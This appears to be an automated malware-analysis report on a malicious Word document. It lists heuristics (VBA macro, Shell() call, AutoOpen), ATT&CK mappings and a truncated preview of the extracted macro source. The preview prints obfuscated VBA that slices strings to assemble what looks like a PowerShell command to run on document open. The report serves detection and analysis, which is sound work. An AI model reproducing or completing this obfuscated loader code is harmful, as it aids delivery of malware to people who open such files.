MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing a VBA macro. The critical heuristic firing indicates a Shell() call within the VBA code, suggesting an attempt to execute arbitrary commands. The AutoOpen macro marker further supports the malicious intent of this document. The macro's obfuscated nature prevents a more detailed analysis of its specific actions.
Heuristics 5
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 246240 bytes |
SHA-256: 79e2928499a91d91d50ae90eec60581a739815923e24b680f7d98a968545f3cb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "EzHGczd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function hKmAEoQNTSI()
On Error Resume Next
prClFam = (GYZqVFnui - CDbl(178804) + nTEwHrsdKMJ + Fix(QZNoT / CLng(777485 * Sqr(lkEOU))) - 143648 / Sin(OQQbmlFlbBG - PtkLsbPaV - 466620 + CLng(Izchl)) * 415217 * Fix(178804))
PjUFm = "8Rowers9hgTqyUSGgOA7JA4U4hellGwSx . ((GENPcsDK7wq3DaR"
DiLdKGVMR = CStr(Left(Right(PjUFm, 52), 5)) + CStr(Left(Right(PjUFm, 29), 4)) + Left(Right(PjUFm, 21), 4) + Left(Right(PjUFm, 17), 4) + Left(Right(PjUFm, 44), 1)
dKHXqXJDVH = "szeEPqc*mdR*').nAMI4gQU[3SL74HzbD9b2WSi5vek-vArIabLe 'ESUsHwVUatd4ZD6jBk7C8,11,zHMnjRac"
uouZYd = Left(Right(dKHXqXJDVH, 44), 11) + CStr(Left(Right(dKHXqXJDVH, 80), 11)) + Left(Right(dKHXqXJDVH, 85), 1) + CStr(Left(Right(dKHXqXJDVH, 64), 2)) + CStr(Left(Right(dKHXqXJDVH, 12), 4))
UrwZYNjUI = "szIEPqce('. ( ([sTr4gQUAngL74HzbD9b2WSi5vekqgx2]-jOin'')( HwVUatd4ZD6jBk7C81feUz]ryIVacRv9XeA"
rHpJziYoDw = CStr(Left(Right(UrwZYNjUI, 47), 12)) + CStr(Left(Right(UrwZYNjUI, 85), 11)) + Left(Right(UrwZYNjUI, 91), 1) + Left(Right(UrwZYNjUI, 69), 2) + CStr(Left(Right(UrwZYNjUI, 13), 5))
IDZEjmS = "sE3ePreFBdRmNhliCqIerBOswSL74HzbD9e2WSi"
twrIhzw = Left(Right(IDZEjmS, 20), 5) + CStr(Left(Right(IDZEjmS, 36), 5)) + CStr(Left(Right(IDZEjmS, 38), 1)) + CStr(Left(Right(IDZEjmS, 29), 1)) + CStr(Left(Right(IDZEjmS, 5), 1))
zXwUiK = "3u[1,EP]ceBdgNCE)iCqI4gQUAw"
bRwicjbhbi = Left(Right(zXwUiK, 14), 4) + Left(Right(zXwUiK, 25), 3) + Left(Right(zXwUiK, 27), 1) + Left(Right(zXwUiK, 20), 1)
qDonbjvaE = Chr(43)
hHrUVjtLRG = "2b'HqEiz3EPq"
mpGHDTUQmHz = CStr(Left(Right(hHrUVjtLRG, 7), 2)) + CStr(Left(Right(hHrUVjtLRG, 11), 2))
iBXsYNcY = Chr(43)
DLiXtwTRSd = "sz3dPqceBdb) ((EibLD5nsawSL74Hasd9b2WSi5vekqgxAzKKpOzlESU'xEib-JOInEibEi7C81feUzHMnjRacRv9XeAmaR4qCbO = EibmdCmqOIe8h"
wKUIO = CStr(Left(Right(DLiXtwTRSd, 60), 15)) + Left(Right(DLiXtwTRSd, 107), 14) + Left(Right(DLiXtwTRSd, 114), 1) + Left(Right(DLiXtwTRSd, 87), 3) + Left(Right(DLiXtwTRSd, 16), 6)
JQZmW = Chr(43)
zjupfmwpO = (ANVako - CDbl(531570) + vBwoPR + Fix(HniutSuhO / CLng(835175 * Sqr(ZLzzw))) - 531351 / Sin(cjzvQ - CLdjZTjO - 477086 + CLng(iOKisEEvvRS)) * 259741 * Fix(531570))
XmztdvNHz = "iu(BEEPbceBdgEib&iCqI4gQUAw"
MMEoWT = Left(Right(XmztdvNHz, 14), 4) + Left(Right(XmztdvNHz, 25), 3) + Left(Right(XmztdvNHz, 27), 1) + Left(Right(XmztdvNHz, 20), 1)
hfShbH = Chr(43)
PwnXj = "iuhnBEPqbeBdgmEibgCqI4gQUAwSL7"
RDdKp = Left(Right(PwnXj, 16), 4) + Left(Right(PwnXj, 28), 4) + CStr(Left(Right(PwnXj, 30), 1)) + CStr(Left(Right(PwnXj, 22), 1))
JsiDj = Chr(43)
fVjKlsb = "bgEisz3EPqEibdgmNhliC"
zMHodaMoKu = CStr(Left(Right(fVjKlsb, 11), 3)) + Left(Right(fVjKlsb, 20), 3) + Left(Right(fVjKlsb, 21), 1)
jfoFuhDCZli = Chr(43)
qoTEqoowt = "2bhHqEiz3EPq"
TYaIbAU = CStr(Left(Right(qoTEqoowt, 7), 2)) + CStr(Left(Right(qoTEqoowt, 11), 2))
AIkWBaqpH = Chr(43)
nKjkFYd = "heBgsz3EPqBghdgmNhliC"
SqXGwiB = CStr(Left(Right(nKjkFYd, 11), 3)) + Left(Right(nKjkFYd, 20), 3) + Left(Right(nKjkFYd, 21), 1)
RDTrOuJTswM = (vHhlKHzB - CDbl(510856) + HKmZlpidA + Fix(LYjjrv / CLng(23314 * Sqr(MGzhWub))) - 134218 / Sin(IKDDfEvWLK - hRcEfprlBDM - 14632 + CLng(qpqvtECk)) * 289198 * Fix(510856))
awObFsYhzBF = Chr(43)
LwlaOlhwMAE = "b1FHEisz3"
cuInTw = Left(Right(LwlaOlhwMAE, 5), 2) + Left(Right(LwlaOlhwMAE, 9), 1)
XSwPUfm = Chr(43)
QWSdi = "sE3w-objedgmihliCqI4gQEibBgh4HzbD9b2WSi5bekqg"
GiWvEPZznSp = CStr(Left(Right(QWSdi, 23), 6)) + Left(Right(QWSdi, 42), 6) + CStr(Left(Right(QWSdi, 44), 1)) + Left(Right(QWSdi, 33), 1) + Left(Right(QWSdi, 5), 1)
wfIjXLMX = Chr(43)
IpdjbaUm = "hcBgsz3EPqEibdgmNhliC"
YjHTFLdbh = CStr(Left(Right(IpdjbaUm, 11), 3)) + Left(Right(IpdjbaUm, 20), 3) + Left(Right(IpdjbaUm, 21), 1)
vSzSDdGAwDz = Chr(43)
NPTdT = "'tBgsz3EPqBghdgmNhliC"
VdVWrKS = CStr(Left(Right(NPTdT, 11), 3)) + Left(Right(NPTdT, 20)
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.